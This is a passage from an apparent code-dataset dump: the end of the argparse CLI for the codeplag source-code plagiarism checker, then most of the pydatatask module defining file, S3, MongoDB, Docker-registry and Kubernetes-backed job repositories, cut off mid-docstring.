DEFAULT_GENERAL_REPORT_NAME,\n EXTENSION_CHOICE,\n LANGUAGE_CHOICE,\n MODE_CHOICE,\n REPORTS_EXTENSION_CHOICE,\n UTIL_NAME,\n UTIL_VERSION,\n)\n\n\nclass CheckUniqueStore(argparse.Action):\n \"\"\"Checks that the list of arguments contains no duplicates, then stores\"\"\"\n\n def __call__(\n self,\n _parser: argparse.ArgumentParser,\n namespace: argparse.Namespace,\n values: List[str],\n _option_string: Optional[str] = None,\n ):\n if len(values) > len(set(values)):\n raise argparse.ArgumentError(\n self,\n \"You cannot specify the same value multiple times. \"\n f\"You provided {values}\",\n )\n setattr(namespace, self.dest, values)\n\n\nclass DirPath(Path):\n \"\"\"Path that raising argparse.ArgumentTypeError when parsing CLI\n arguments if directory is not exists.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n path = Path(*args, **kwargs)\n if not path.is_dir():\n raise argparse.ArgumentTypeError(\n f\"Directory '{path}' not found or not a directory.\"\n )\n\n return Path.__new__(Path, *args, **kwargs)\n\n\nclass FilePath(Path):\n \"\"\"Path that raising argparse.ArgumentTypeError when parsing CLI\n arguments if file is not exists.\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n path = Path(*args, **kwargs)\n if not path.is_file():\n raise argparse.ArgumentTypeError(f\"File '{path}' not found or not a file.\")\n\n return Path.__new__(Path, *args, **kwargs)\n\n\nclass CodeplagCLI(argparse.ArgumentParser):\n \"\"\"The argument parser of the codeplag util.\"\"\"\n\n def __add_settings_path(self, subparsers: argparse._SubParsersAction) -> None:\n settings = subparsers.add_parser(\n \"settings\",\n help=f\"Modifies and shows static settings of the '{UTIL_NAME}' util.\",\n )\n\n settings_commands = settings.add_subparsers(\n help=f\"Settings commands of the '{UTIL_NAME}' util.\",\n required=True,\n metavar=\"COMMAND\",\n dest=\"settings\",\n )\n\n # settings modify\n settings_modify = settings_commands.add_parser(\n \"modify\",\n help=f\"Manage the '{UTIL_NAME}' util settings.\",\n )\n settings_modify.add_argument(\n \"-env\",\n \"--environment\",\n help=\"Path to the environment file with GitHub access token.\",\n type=FilePath,\n )\n settings_modify.add_argument(\n \"-r\",\n \"--reports\",\n help=\"If defined, then saves reports about suspect works \"\n \"into provided path.\",\n metavar=\"DIRECTORY\",\n type=DirPath,\n )\n settings_modify.add_argument(\n \"-re\",\n \"--reports_extension\",\n help=\"Extension of saved report files.\",\n type=str,\n choices=REPORTS_EXTENSION_CHOICE,\n )\n settings_modify.add_argument(\n \"-sp\",\n \"--show_progress\",\n help=\"Show progress of searching plagiarism.\",\n type=int,\n choices=[0, 1],\n )\n settings_modify.add_argument(\n \"-t\",\n \"--threshold\",\n help=\"Threshold of analyzer which classifies two work as same. \"\n \"If this number is too large, such as 99, \"\n \"then completely matching jobs will be found. \"\n \"Otherwise, if this number is small, such as 50, \"\n \"then all work with minimal similarity will be found.\",\n type=int,\n choices=range(50, 100),\n metavar=\"{50, 51, ..., 99}\",\n )\n settings_modify.add_argument(\n \"-l\",\n \"--language\",\n help=\"The language of help messages, generated reports, errors.\",\n type=str,\n choices=LANGUAGE_CHOICE,\n )\n\n # settings show\n settings_commands.add_parser(\n \"show\",\n help=f\"Show the '{UTIL_NAME}' util settings.\",\n )\n\n def __add_check_path(self, subparsers: argparse._SubParsersAction) -> None:\n check = subparsers.add_parser(\"check\", help=\"Start searching similar works.\")\n check.add_argument(\n \"-d\",\n \"--directories\",\n metavar=\"DIRECTORY\",\n type=DirPath,\n help=\"Absolute or relative path to a local directories with project files.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check.add_argument(\n \"-f\",\n \"--files\",\n metavar=\"FILE\",\n type=FilePath,\n help=\"Absolute or relative path to files on a computer.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check.add_argument(\n \"--mode\",\n help=\"Choose one of the following modes of searching plagiarism. \"\n \"The 'many_to_many' mode may require more free memory.\",\n type=str,\n choices=MODE_CHOICE,\n default=\"many_to_many\",\n )\n check.add_argument(\n \"-pe\",\n \"--path-regexp\",\n # TODO: Check that it used with listed below options\n help=\"A regular expression for filtering checked works by name. \"\n \"Used with options 'directories', 'github-user' and 'github-project-folders'.\",\n type=str,\n )\n\n check_required = check.add_argument_group(\"required options\")\n check_required.add_argument(\n \"-ext\",\n \"--extension\",\n help=\"Extension responsible for the analyzed programming language.\",\n type=str,\n choices=EXTENSION_CHOICE,\n required=True,\n )\n\n check_github = check.add_argument_group(\"GitHub options\")\n check_github.add_argument(\n \"-ab\",\n \"--all-branches\",\n help=\"Searching in all branches.\",\n action=\"store_true\",\n )\n check_github.add_argument(\n \"-re\",\n \"--repo-regexp\",\n type=str,\n help=\"A regular expression to filter searching repositories on GitHub.\",\n )\n check_github.add_argument(\n \"-gf\",\n \"--github-files\",\n metavar=\"GITHUB_FILE\",\n type=GitHubContentUrl,\n help=\"URL to file in a GitHub repository.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n check_github.add_argument(\n \"-gu\", \"--github-user\", type=str, help=\"GitHub organisation/user name.\"\n )\n check_github.add_argument(\n \"-gp\",\n \"--github-project-folders\",\n metavar=\"GITHUB_PROJECT_FOLDER\",\n type=GitHubContentUrl,\n help=\"URL to a GitHub project folder.\",\n nargs=\"+\",\n action=CheckUniqueStore,\n default=[],\n )\n\n def __add_report_path(self, subparsers: argparse._SubParsersAction) -> None:\n report = subparsers.add_parser(\n \"report\",\n help=f\"Handling generated by the {UTIL_NAME} reports as creating html \"\n \"report file or show it on console.\",\n )\n\n report_commands = report.add_subparsers(\n help=f\"Report commands of the '{UTIL_NAME}' util.\",\n required=True,\n metavar=\"COMMAND\",\n dest=\"report\",\n )\n\n # report create\n report_create = report_commands.add_parser(\n \"create\",\n help=\"Generate general report from created some time ago report files.\",\n )\n report_create.add_argument(\n \"-p\",\n \"--path\",\n help=\"Path to save generated general report. \"\n \"If it's directory, than creates file in it with \"\n f\"name '{DEFAULT_GENERAL_REPORT_NAME}'.\",\n required=True,\n type=Path,\n )\n\n def __init__(self):\n super(CodeplagCLI, self).__init__(\n prog=UTIL_NAME,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Program help to find similar parts of source \"\n \"codes for the different languages.\",\n )\n self.add_argument(\n \"-v\",\n \"--version\",\n help=\"Print current version number and exit.\",\n action=\"version\",\n version=f\"{UTIL_NAME} {UTIL_VERSION}\",\n )\n self.add_argument(\n \"--verbose\",\n help=\"Show debug messages.\",\n action=\"store_true\",\n )\n\n subparsers = self.add_subparsers(\n help=\"Commands help.\",\n parser_class=argparse.ArgumentParser,\n required=True,\n metavar=\"COMMAND\",\n dest=\"root\",\n )\n\n self.__add_settings_path(subparsers)\n self.__add_check_path(subparsers)\n self.__add_report_path(subparsers)\n","repo_name":"OSLL/code-plagiarism","sub_path":"src/codeplag/codeplagcli.py","file_name":"codeplagcli.py","file_ext":"py","file_size_in_byte":9281,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"} +{"seq_id":"11040107019","text":"\"\"\"\nRepositories are arbitrary key-value stores. They are the data part of pydatatask.\nYou can store your data in any way you desire and as long as you can write a Repository class to describe it, it can be\nused to drive a pipeline.\n\nThe notion of the \"value\" part of the key-value store abstraction is defined very, very loosely. The repository base\nclass doesn't have an interface to get or store values, only to query for and delete keys. Instead, you have to know\nwhich repository subclass you're working with, and use its interfaces. For example, `MetadataRepository` assumes that\nits values are structured objects and loads them fully into memory, and `BlobRepository` provides a streaming interface\nto a flat address space.\n\"\"\"\nfrom typing import (\n TYPE_CHECKING,\n Any,\n AsyncGenerator,\n AsyncIterable,\n Awaitable,\n Callable,\n Coroutine,\n Dict,\n List,\n Literal,\n Optional,\n overload,\n)\nfrom abc import ABC, abstractmethod\nfrom collections import Counter\nfrom pathlib import Path\nimport base64\nimport hashlib\nimport inspect\nimport io\nimport logging\nimport os\nimport string\n\nfrom kubernetes_asyncio.client import V1Pod\nfrom types_aiobotocore_s3.client import S3Client\nimport aiofiles.os\nimport aiohttp.client_exceptions\nimport aioshutil\nimport botocore.exceptions\nimport docker_registry_client_async\nimport dxf\nimport motor.motor_asyncio\nimport yaml\n\nfrom .utils import AReadStream, AReadText, AWriteStream, AWriteText, roundrobin\n\nif TYPE_CHECKING:\n from .task import ExecutorTask, KubeTask\n\nl = logging.getLogger(__name__)\n\n__all__ = (\n \"Repository\",\n \"BlobRepository\",\n \"MetadataRepository\",\n \"FileRepositoryBase\",\n \"FileRepository\",\n \"DirectoryRepository\",\n \"S3BucketRepository\",\n \"S3BucketInfo\",\n \"MongoMetadataRepository\",\n \"InProcessMetadataRepository\",\n \"InProcessBlobStream\",\n \"InProcessBlobRepository\",\n \"DockerRepository\",\n \"LiveKubeRepository\",\n \"ExecutorLiveRepo\",\n \"AggregateOrRepository\",\n \"AggregateAndRepository\",\n \"BlockingRepository\",\n \"YamlMetadataRepository\",\n \"YamlMetadataFileRepository\",\n \"YamlMetadataS3Repository\",\n \"RelatedItemRepository\",\n)\n\n\ndef job_getter(f):\n \"\"\"\n Use this function to annotate non-abstract methods which take a job identifier as their first parameter. This is\n used by RelatedItemRepository to automatically translate job identifiers to related ones.\n \"\"\"\n if not inspect.iscoroutinefunction(f):\n raise TypeError(\"only async functions can be job_getters\")\n f.is_job_getter = True\n return f\n\n\nclass Repository(ABC):\n \"\"\"\n A repository is a key-value store where the keys are names of jobs. Since the values have unspecified semantics, the\n only operations you can do on a generic repository are query for keys.\n\n A repository can be async-iterated to get a listing of its members.\n \"\"\"\n\n CHARSET = CHARSET_START_END = string.ascii_letters + string.digits\n\n @classmethod\n def is_valid_job_id(cls, job: str):\n \"\"\"\n Determine whether the given job identifier is valid, i.e. that it contains only valid characters\n (numbers and letters by default).\n \"\"\"\n return (\n 0 < len(job) < 64\n and all(c in cls.CHARSET for c in job)\n and job[0] in cls.CHARSET_START_END\n and job[-1] in cls.CHARSET_START_END\n )\n\n async def filter_jobs(self, iterator: AsyncIterable[str]) -> AsyncIterable[str]:\n \"\"\"\n Apply `is_valid_job_id` as a filter to an async iterator.\n \"\"\"\n async for job in iterator:\n if self.is_valid_job_id(job):\n yield job\n else:\n l.warning(\"Skipping %s %s - not a valid job id\", self, repr(job))\n\n async def contains(self, item):\n \"\"\"\n Determine whether the given job identifier is present in this repository.\n\n The default implementation is quite inefficient; please override this if possible.\n \"\"\"\n async for x in self:\n if x == item:\n return True\n return False\n\n def __aiter__(self):\n return self.filter_jobs(self.unfiltered_iter())\n\n @abstractmethod\n async def unfiltered_iter(self) -> AsyncGenerator[str, None]:\n \"\"\"\n The core method of Repository. Implement this to produce an iterable of every string which could potentially\n be a job identifier present in this repository. When the repository is iterated directly, this will be filtered\n by `filter_jobs`.\n \"\"\"\n raise NotImplementedError\n # noinspection PyUnreachableCode\n yield None # pylint: disable=unreachable\n\n @abstractmethod\n async def info(self, job) -> Any:\n \"\"\"\n Returns an arbitrary piece of data related to job. Notably, this is used during templating.\n This should do something meaningful even if the repository does not contain the requested job.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n async def delete(self, job):\n \"\"\"\n Delete the given job from the repository. This should succeed even if the job is not present in this repository.\n \"\"\"\n raise NotImplementedError\n\n async def info_all(self) -> Dict[str, Any]:\n \"\"\"\n Produce a mapping from every job present in the repository to its corresponding info. The default implementation\n is somewhat inefficient; please override it if there is a more effective way to load all info.\n \"\"\"\n return {job: await self.info(job) async for job in self}\n\n async def validate(self):\n \"\"\"\n Override this method to raise an exception if for any reason the repository is misconfigured. This will be\n automatically called by the pipeline on opening.\n \"\"\"\n\n def map(\n self, func: Callable, filt: Optional[Callable[[str], Awaitable[bool]]] = None, allow_deletes=False\n ) -> \"MapRepository\":\n \"\"\"\n Generate a :class:`MapRepository` based on this repository and the given parameters.\n \"\"\"\n return MapRepository(self, func, filt, allow_deletes=allow_deletes)\n\n\nclass MapRepository(Repository):\n \"\"\"\n A MapRepository is a repository which uses arbitrary functions to map and filter results from a base repository.\n \"\"\"\n\n def __init__(\n self,\n base: Repository,\n func: Callable[[Any], Coroutine[None, None, Any]],\n filt: Optional[Callable[[str], Awaitable[bool]]] = None,\n allow_deletes=False,\n ):\n \"\"\"\n :param func: The function to use to translate the base repository's `info` results into the mapped `info`\n results.\n :param filt: Optional: An async function to use to determine whether a given key should be considered part of\n the mapped repository.\n :param allow_deletes: Whether the delete operation will do anything on the mapped repository.\n \"\"\"\n self.base = base\n self.func = func\n self.filter = filt\n self.allow_deletes = allow_deletes\n\n async def contains(self, item):\n if self.filter is None or await self.filter(item):\n return await self.base.contains(item)\n return False\n\n async def delete(self, job):\n if self.allow_deletes:\n await self.base.delete(job)\n\n async def unfiltered_iter(self):\n async for item in self.base.unfiltered_iter():\n if self.filter is None or await self.filter(item):\n yield item\n\n async def info(self, job):\n return await self.func(await self.base.info(job))\n\n async def info_all(self) -> Dict[str, Any]:\n result = await self.base.info_all()\n to_remove = []\n for k, v in result.items():\n if self.filter is None or await self.filter(k):\n result[k] = await self.func(v)\n else:\n to_remove.append(k)\n for k in to_remove:\n result.pop(k)\n return result\n\n\nclass MetadataRepository(Repository, ABC):\n \"\"\"\n A metadata repository has values which are small, structured data, and loads them entirely into memory, returning\n the structured data from the `info` method.\n \"\"\"\n\n @abstractmethod\n async def info(self, job):\n \"\"\"\n Retrieve the data with key ``job`` from the repository.\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n async def dump(self, job, data):\n \"\"\"\n Insert ``data`` into the repository with key ``job``.\n \"\"\"\n raise NotImplementedError\n\n\nclass BlobRepository(Repository, ABC):\n \"\"\"\n A blob repository has values which are flat data blobs that can be streamed for reading or writing.\n \"\"\"\n\n @overload\n async def open(self, job: str, mode: Literal[\"r\"]) -> AReadText:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"rb\"]) -> AReadStream:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"w\"]) -> AWriteText:\n ...\n\n @overload\n async def open(self, job: str, mode: Literal[\"wb\"]) -> AWriteStream:\n ...\n\n @abstractmethod\n async def open(self, job, mode=\"r\"):\n \"\"\"\n Open the given job's value as a stream for reading or writing, in text or binary mode.\n \"\"\"\n raise NotImplementedError\n\n\nclass FileRepositoryBase(Repository, ABC):\n \"\"\"\n A file repository is a local directory where each job identifier is a filename, optionally suffixed with an\n extension before hitting the filesystem. This is an abstract base class for other file repositories which have more\n to say about what is found at these filepaths.\n \"\"\"\n\n def __init__(self, basedir, extension=\"\", case_insensitive=False):\n self.basedir = Path(basedir)\n self.extension = extension\n self.case_insensitive = case_insensitive\n\n async def contains(self, item):\n return await aiofiles.os.path.exists(self.basedir / (item + self.extension))\n\n def __repr__(self):\n return f'<{type(self).__name__} {self.basedir / (\"*\" + self.extension)}>'\n\n async def unfiltered_iter(self):\n for name in await aiofiles.os.listdir(self.basedir):\n if self.case_insensitive:\n cond = name.lower().endswith(self.extension.lower())\n else:\n cond = name.endswith(self.extension)\n if cond:\n yield name[: -len(self.extension) if self.extension else None]\n\n async def validate(self):\n self.basedir.mkdir(exist_ok=True, parents=True)\n if not os.access(self.basedir, os.W_OK):\n raise PermissionError(f\"Cannot write to {self.basedir}\")\n\n def fullpath(self, job) -> Path:\n \"\"\"\n Construct the full local path of the file corresponding to ``job``.\n \"\"\"\n return self.basedir / (job + self.extension)\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The templating info provided by a file repository is the full path to the corresponding file as a string.\n \"\"\"\n return str(self.fullpath(job))\n\n\nclass FileRepository(FileRepositoryBase, BlobRepository):\n \"\"\"\n A file repository whose members are files, treated as streamable blobs.\n \"\"\"\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n return aiofiles.open(self.fullpath(job), mode)\n\n async def delete(self, job):\n try:\n await aiofiles.os.unlink(self.fullpath(job))\n except FileNotFoundError:\n pass\n\n\nclass DirectoryRepository(FileRepositoryBase):\n \"\"\"\n A file repository whose members are directories.\n \"\"\"\n\n def __init__(self, *args, discard_empty=False, **kwargs):\n \"\"\"\n :param discard_empty: Whether only directories containing at least one member should be considered as \"present\"\n in the repository.\n \"\"\"\n super().__init__(*args, **kwargs)\n self.discard_empty = discard_empty\n\n @job_getter\n async def mkdir(self, job):\n \"\"\"\n Create an empty directory corresponding to ``job``. Do nothing if the directory already exists.\n \"\"\"\n try:\n await aiofiles.os.mkdir(self.fullpath(job))\n except FileExistsError:\n pass\n\n async def delete(self, job):\n if await self.contains(job):\n await aioshutil.rmtree(self.fullpath(job))\n\n async def contains(self, item):\n result = await super().contains(item)\n if not self.discard_empty:\n return result\n if not result:\n return False\n return bool(list(await aiofiles.os.listdir(self.fullpath(item))))\n\n async def unfiltered_iter(self):\n async for item in super().unfiltered_iter():\n if self.discard_empty:\n if bool(list(await aiofiles.os.listdir(self.fullpath(item)))):\n yield item\n else:\n yield item\n\n\nclass S3BucketBinaryWriter:\n \"\"\"\n A class for streaming (or buffering) byte data to be written to an `S3BucketRepository`.\n \"\"\"\n\n def __init__(self, repo: \"S3BucketRepository\", job: str):\n self.repo = repo\n self.job = job\n self.buffer = io.BytesIO()\n super().__init__()\n\n async def __aenter__(self):\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.close()\n\n async def close(self):\n \"\"\"\n Close and flush the data to the bucket.\n \"\"\"\n self.buffer.seek(0, io.SEEK_END)\n size = self.buffer.tell()\n self.buffer.seek(0, io.SEEK_SET)\n await self.repo.client.put_object(\n Bucket=self.repo.bucket,\n Key=self.repo.object_name(self.job),\n Body=self.buffer,\n ContentLength=size,\n ContentType=self.repo.mimetype,\n )\n\n async def write(self, data: bytes):\n \"\"\"\n Write some data to the stream.\n \"\"\"\n self.buffer.write(data)\n\n\nclass S3BucketReader:\n \"\"\"\n A class for streaming byte data from an `S3BucketRepository`.\n \"\"\"\n\n def __init__(self, body):\n self.body = body\n\n async def close(self):\n \"\"\"\n Close and release the stream.\n \"\"\"\n self.body.close()\n\n async def read(self, n=None): # pylint: disable=unused-argument :(\n \"\"\"\n Read the entire body of the blob. Due to API limitations, we can't read less than that at once...\n \"\"\"\n return await self.body.read()\n\n async def __aenter__(self):\n await self.body.__aenter__()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.body.__aexit__(exc_type, exc_val, exc_tb)\n\n\nclass S3BucketInfo:\n \"\"\"\n The data structure returned from :meth:`S3BucketRepository.info`.\n\n :ivar uri: The s3 URI of the current job's resource, e.g. ``s3://bucket/prefix/job.ext``. ``str(info)`` will also\n return this.\n :ivar endpoint: The URL of the API server providing the S3 interface.\n :ivar bucket: The name of the bucket objects are stored in.\n :ivar prefix: How to prefix an object name such that it will fit into this repository.\n :ivar suffix: How to suffix an object name such that it will fit into this repository.\n \"\"\"\n\n def __init__(self, endpoint: str, uri: str, bucket: str, prefix: str, suffix: str):\n self.endpoint = endpoint\n self.uri = uri\n self.prefix = prefix\n self.suffix = suffix\n self.bucket = bucket\n\n def __str__(self):\n return self.uri\n\n\nclass S3BucketRepository(BlobRepository):\n \"\"\"\n A repository where keys are paths in a S3 bucket. Provides a streaming interface to the corresponding blobs.\n \"\"\"\n\n def __init__(\n self,\n client: Callable[[], S3Client],\n bucket: str,\n prefix: str = \"\",\n suffix: str = \"\",\n mimetype: str = \"application/octet-stream\",\n incluster_endpoint: Optional[str] = None,\n ):\n \"\"\"\n :param client: A callable returning an aiobotocore S3 client connected and authenticated to the server you wish\n to store things on.\n :param bucket: The name of the bucket from which to load and store.\n :param prefix: A prefix to put on the job name before translating it into a bucket path. If this is meant to be\n a directory name it should end with a slash character.\n :param suffix: A suffix to put on the job name before translating it into a bucket path. If this is meant to\n be a file extension it should start with a dot.\n :param mimetype: The MIME type to set the content when adding data.\n :param incluster_endpoint: Optional: An endpoint URL to provide as the result of info() queries instead of\n extracting the URL from ``client``.\n \"\"\"\n self._client = client\n self.bucket = bucket\n self.prefix = prefix\n self.suffix = suffix\n self.mimetype = mimetype\n self.incluster_endpoint = incluster_endpoint\n\n @property\n def client(self):\n \"\"\"\n The aiobotocore S3 client. This will raise an error if the client comes from a session which is not opened.\n \"\"\"\n return self._client()\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self.bucket}/{self.prefix}*{self.suffix}>\"\n\n async def contains(self, item):\n try:\n await self.client.head_object(Bucket=self.bucket, Key=self.object_name(item))\n except botocore.exceptions.ClientError:\n return False\n else:\n return True\n\n async def unfiltered_iter(self):\n paginator = self.client.get_paginator(\"list_objects\")\n async for page in paginator.paginate(Bucket=self.bucket, Prefix=self.prefix):\n for obj in page.get(\"Contents\", []):\n if obj[\"Key\"].endswith(self.suffix):\n yield obj[\"Key\"][len(self.prefix) : -len(self.suffix) if self.suffix else None]\n\n async def validate(self):\n try:\n await self.client.head_bucket(Bucket=self.bucket)\n except botocore.exceptions.ClientError as e:\n if \"404\" in str(e):\n await self.client.create_bucket(Bucket=self.bucket)\n else:\n raise\n\n def object_name(self, job):\n \"\"\"\n Return the object name for the given job.\n \"\"\"\n return f\"{self.prefix}{job}{self.suffix}\"\n\n @job_getter\n async def open(self, job, mode=\"r\"):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n if mode == \"wb\":\n return S3BucketBinaryWriter(self, job)\n elif mode == \"w\":\n return AWriteText(S3BucketBinaryWriter(self, job))\n elif mode == \"rb\":\n return S3BucketReader((await self.client.get_object(Bucket=self.bucket, Key=self.object_name(job)))[\"Body\"])\n elif mode == \"r\":\n return AReadText(\n S3BucketReader((await self.client.get_object(Bucket=self.bucket, Key=self.object_name(job)))[\"Body\"])\n )\n else:\n raise ValueError(mode)\n\n @job_getter\n async def info(self, job):\n \"\"\"\n Return an `S3BucketInfo` corresponding to the given job.\n \"\"\"\n return S3BucketInfo(\n self.incluster_endpoint or self.client._endpoint.host,\n f\"s3://{self.bucket}/{self.object_name(job)}\",\n self.bucket,\n self.prefix,\n self.suffix,\n )\n\n async def delete(self, job):\n await self.client.delete_object(Bucket=self.bucket, Key=self.object_name(job))\n\n\nclass MongoMetadataRepository(MetadataRepository):\n \"\"\"\n A metadata repository using a MongoDB collection as the backing store.\n \"\"\"\n\n def __init__(\n self,\n collection: Callable[[], motor.motor_asyncio.AsyncIOMotorCollection],\n subcollection: Optional[str],\n ):\n \"\"\"\n :param collection: A callable returning a motor async collection.\n :param subcollection: Optional: the name of a subcollection within the collection in which to store data.\n \"\"\"\n self._collection = collection\n self._subcollection = subcollection\n\n def __repr__(self):\n return f\"<{type(self).__name__} {self._subcollection}>\"\n\n @property\n def collection(self) -> motor.motor_asyncio.AsyncIOMotorCollection:\n \"\"\"\n The motor async collection data will be stored in. If this is provided by an unopened session, raise an error.\n \"\"\"\n result = self._collection()\n if self._subcollection is not None:\n result = result[self._subcollection]\n return result\n\n async def contains(self, item):\n return await self.collection.count_documents({\"_id\": item}) != 0\n\n async def delete(self, job):\n await self.collection.delete_one({\"_id\": job})\n\n async def unfiltered_iter(self):\n async for x in self.collection.find({}, projection=[]):\n yield x[\"_id\"]\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info of a mongo metadata repository is the literal value stored in the repository with identifier ``job``.\n \"\"\"\n result = await self.collection.find_one({\"_id\": job})\n if result is None:\n result = {}\n return result\n\n async def info_all(self) -> Dict[str, Any]:\n return {entry[\"_id\"]: entry async for entry in self.collection.find({})}\n\n @job_getter\n async def dump(self, job, data):\n if not self.is_valid_job_id(job):\n raise KeyError(job)\n await self.collection.replace_one({\"_id\": job}, data, upsert=True)\n\n\nclass DockerRepository(Repository):\n \"\"\"\n A docker repository is, well, an actual docker repository hosted in some registry somewhere. Keys translate to tags\n on this repository.\n \"\"\"\n\n def __init__(\n self,\n registry: Callable[[], docker_registry_client_async.DockerRegistryClientAsync],\n domain: str,\n repository: str,\n ):\n \"\"\"\n :param registry: A callable returning a\n `docker_registry_client_async <https://pypi.org/project/docker-registry-client-async/>`_\n client object with appropriate authentication information.\n :param domain: The registry domain to connect to, e.g. ``index.docker.io``.\n :param repository: The repository to store images in within the domain, e.g. ``myname/myrepo``.\n \"\"\"\n self._registry = registry\n self.domain = domain\n self.repository = repository\n\n @property\n def registry(self) -> docker_registry_client_async.DockerRegistryClientAsync:\n \"\"\"\n The ``docker_registry_client_async`` client object. If this is provided by an unopened session, raise an error.\n \"\"\"\n return self._registry()\n\n async def unfiltered_iter(self):\n try:\n image = docker_registry_client_async.ImageName(self.repository, endpoint=self.domain)\n tags = (await self.registry.get_tags(image)).tags[\"tags\"]\n if tags is None:\n return\n for tag in tags:\n yield tag\n except aiohttp.client_exceptions.ClientResponseError as e:\n if e.status != 404:\n raise\n\n def __repr__(self):\n return f\"<DockerRepository {self.domain}/{self.repository}:*>\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by a docker repository is a dict with two keys, \"withdomain\" and \"withoutdomain\". e.g.:\n\n .. code::\n\n { \"withdomain\": \"docker.example.com/myname/myrepo:job\", \"withoutdomain\": \"myname/myrepo:job\" }\n \"\"\"\n return {\n \"withdomain\": f\"{self.domain}/{self.repository}:{job}\",\n \"withoutdomain\": f\"{self.repository}:{job}\",\n }\n\n def _dxf_auth(self, dxf_obj, response):\n # what a fucking hack\n for pattern, credentials in self.registry.credentials.items():\n if pattern.fullmatch(self.domain):\n result = credentials\n break\n else:\n raise PermissionError(\"Missing credentials for %s\" % self.domain)\n if self.registry.ssl:\n username, password = base64.b64decode(result).decode().split(\":\")\n dxf_obj.authenticate(username, password, response)\n else:\n dxf_obj._headers = {\"Authorization\": \"Basic \" + result}\n\n async def delete(self, job):\n # if not await self.contains(job):\n # return\n\n self._delete_inner(job) # blocking! epic fail\n\n def _delete_inner(self, job):\n random_data = os.urandom(16)\n random_digest = \"sha256:\" + hashlib.sha256(random_data).hexdigest()\n\n d = dxf.DXF(\n host=self.domain,\n repo=self.repository,\n auth=self._dxf_auth,\n insecure=not self.registry.ssl,\n )\n d.push_blob(data=random_data, digest=random_digest)\n d.set_alias(job, random_digest)\n d.del_alias(job)\n\n\nclass LiveKubeRepository(Repository):\n \"\"\"\n A repository where keys translate to ``job`` labels on running kube pods. This repository is constructed\n automatically by a `KubeTask` or subclass and is linked as the ``live`` repository. Do not construct this class\n manually.\n \"\"\"\n\n def __init__(self, task: \"KubeTask\"):\n self.task = task\n\n async def unfiltered_iter(self):\n for pod in await self.pods():\n yield pod.metadata.labels[\"job\"]\n\n async def contains(self, item):\n return bool(await self.task.podman.query(task=self.task.name, job=item))\n\n def __repr__(self):\n return f\"<LiveKubeRepository task={self.task.name}>\"\n\n @job_getter\n async def info(self, job):\n \"\"\"\n Cannot template with live kube info. Implement this if you have something in mind.\n \"\"\"\n return None\n\n async def pods(self) -> List[V1Pod]:\n \"\"\"\n A list of live pod objects corresponding to this repository.\n \"\"\"\n return await self.task.podman.query(task=self.task.name)\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from this repository will delete the pod.\n \"\"\"\n pods = await self.task.podman.query(job=job, task=self.task.name)\n for pod in pods: # there... really should be only one\n await self.task.delete(pod)\n # while await self.task.podman.query(job=job, task=self.task.name):\n # await asyncio.sleep(0.2)\n\n\nclass AggregateAndRepository(Repository):\n \"\"\"\n A repository which is said to contain a job if all its children also contain that job\n \"\"\"\n\n def __init__(self, **children: Repository):\n assert children\n self.children = children\n\n async def unfiltered_iter(self):\n counting = Counter()\n async for item in roundrobin([child.unfiltered_iter() for child in self.children.values()]):\n counting[item] += 1\n if counting[item] == len(self.children):\n yield item\n\n async def contains(self, item):\n for child in self.children.values():\n if not await child.contains(item):\n return False\n return True\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by an aggregate And repository is a dict mapping each child's name to that child's info.\n \"\"\"\n return {name: await child.info(job) for name, child in self.children.items()}\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from an aggregate And repository deletes the job from all of its children.\n \"\"\"\n for child in self.children.values():\n await child.delete(job)\n\n\nclass AggregateOrRepository(Repository):\n \"\"\"\n A repository which is said to contain a job if any of its children also contain that job\n \"\"\"\n\n def __init__(self, **children: Repository):\n assert children\n self.children = children\n\n async def unfiltered_iter(self):\n seen = set()\n for child in self.children.values():\n async for item in child.unfiltered_iter():\n if item in seen:\n continue\n seen.add(item)\n yield item\n\n async def contains(self, item):\n for child in self.children.values():\n if await child.contains(item):\n return True\n return False\n\n @job_getter\n async def info(self, job):\n \"\"\"\n The info provided by an aggregate Or repository is a dict mapping each child's name to that child's info.\n \"\"\"\n return {name: await child.info(job) for name, child in self.children.items()}\n\n async def delete(self, job):\n \"\"\"\n Deleting a job from an aggregate Or repository deletes the job from all of its children.\n \"\"\"\n for child in self.children.values():\n await child.delete(job)\n\n\nclass BlockingRepository(Repository):\n \"\"\"\n A class that is said to contain a job if ``source`` contains it and ``unless`` does not contain it\n \"\"\"\n\n def __init__(self, source: Repository, unless: Repository, enumerate_unless=True):\n self.source = source\n self.unless = unless\n self.enumerate_unless = enumerate_unless\n\n async def unfiltered_iter(self):\n if self.enumerate_unless:\n blocked = set()\n async for x in self.unless.unfiltered_iter():\n blocked.add(x)\n else:\n blocked = None\n async for item in self.source.unfiltered_iter():\n if self.enumerate_unless and item in blocked:\n continue\n if not self.enumerate_unless and self.unless.contains(item):\n continue\n yield item\n\n async def contains(self, item):\n return await self.source.contains(item) and not await self.unless.contains(item)\n\n @job_getter\n async def info(self, job):\n return await self.source.info(job)\n\n async def delete(self, job):\n await self.source.delete(job)\n\n\nclass YamlMetadataRepository(BlobRepository, MetadataRepository, ABC):\n \"\"\"\n A metadata repository based on a blob repository. When info is accessed, it will **load the target file into\n memory**, parse it as yaml, and return the resulting object.\n\n This is a base class, and must be overridden to implement the blob 